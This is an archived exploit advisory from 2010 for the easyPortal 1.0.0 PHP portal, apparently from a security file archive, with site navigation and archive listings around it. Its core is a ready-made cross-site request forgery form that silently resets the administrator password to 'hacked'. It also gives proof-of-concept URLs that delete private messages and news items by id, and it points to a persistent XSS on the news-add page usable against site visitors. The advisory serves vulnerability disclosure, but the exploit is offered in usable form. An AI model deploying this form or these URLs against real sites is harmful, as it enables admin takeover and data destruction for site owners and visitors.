easyPortal 1.0.0 XSS / XSRF

easyPortal 1.0.0 XSS / XSRF: Posted Jan 4, 2010; Authored by Milos Zivanovic; easyPortal version 1.0.0 suffers from cross site scripting and cross site request forgery vulnerabilities.; tags | exploit, vulnerability, xss, csrf; SHA-256 | 512ca68b84dab68ebae477ac017370d5debfaa385423275d7ec01d7e84cb1920; Download | Favorite | View

easyPortal 1.0.0 XSS / XSRF

[#-----------------------------------------------------------------------------------------------#]
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail.com
[#] Date: 02. January 2010.
[#-----------------------------------------------------------------------------------------------#]
[#] Application: easyPortal
[#] Version: 1.0.0
[#] Platform: PHP
[#] Homepage: http://www.eazyportal.com/
[#] Vulnerability: Multiple XSRF Vulnerabilities And Persistent XSS
[#-----------------------------------------------------------------------------------------------#]
 
[#]Content
 |--Change admin password
 |--Add news - Persistent XSS
 |--Remove private message by id
 |--Remove news by id
 
[*]Change admin password
 
[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://host/" enctype="multipart/form-data" method="post">
  <input type="hidden" name="a" value="profile"/>
  <input type="hidden" name="uname" value="admin"/>
  <input type="hidden" name="uavatar" value=""/>
  <input type="hidden" name="uemail"  value="e@mail.com"/>
  <input type="hidden" name="upwd" value="hacked"/>
  <input type="hidden" name="ucpwd" value="hacked"/>
  <input type="hidden" name="ulocation" value="moon"/>
  <input type="hidden" name="usignature" value="free your mind and the
ass will follow"/>
  <input type="hidden" name="ushowemail" value="0"/>
  <input type="hidden" name="ugmt" value="0"/>
  <input type="hidden" name="ufile"/>
  <input type="image"
src="http://host/tpl/DefaultGreen/img/button_submit.gif"
name="submit"/>
</form>
[EXPLOIT------------------------------------------------------------------------------------------]
 
[+]Add news - Persistent XSS
 
http://host/index.php?a=administrator&p=news&s=add
 
There we can add new news that can be seen on main page. It is
vulnerable to persistent xss and
attacker can use this to infect website visitors.
 
[-]Remove private message by id
 
[POC----------------------------------------------------------------------------------------------]
http://host/index.php?a=private&inbox=&d=[ID]
[POC----------------------------------------------------------------------------------------------]
 
[-]Remove news by id
 
[POC----------------------------------------------------------------------------------------------]
http://host/index.php?a=administrator&p=news&del=[ID]
[POC----------------------------------------------------------------------------------------------]
 
[#] EOF

Top Authors In Last 30 Days

Red Hat 305 files
Ubuntu 67 files
Debian 23 files
Gentoo 8 files
LiquidWorm 6 files
Apple 5 files
Google Security Research 5 files
Spencer McIntyre 3 files
Ivan Fratric 3 files
Jann Horn 2 files

File Archives

Systems

AIX (430)
Apple (2,133)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,177)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,160)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,495)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,025)
UNIX (9,482)
UnixWare (188)
Windows (6,786)
Other

easyPortal 1.0.0 XSS / XSRF

easyPortal 1.0.0 XSS / XSRF

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

easyPortal 1.0.0 XSS / XSRF

Share This

easyPortal 1.0.0 XSS / XSRF

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems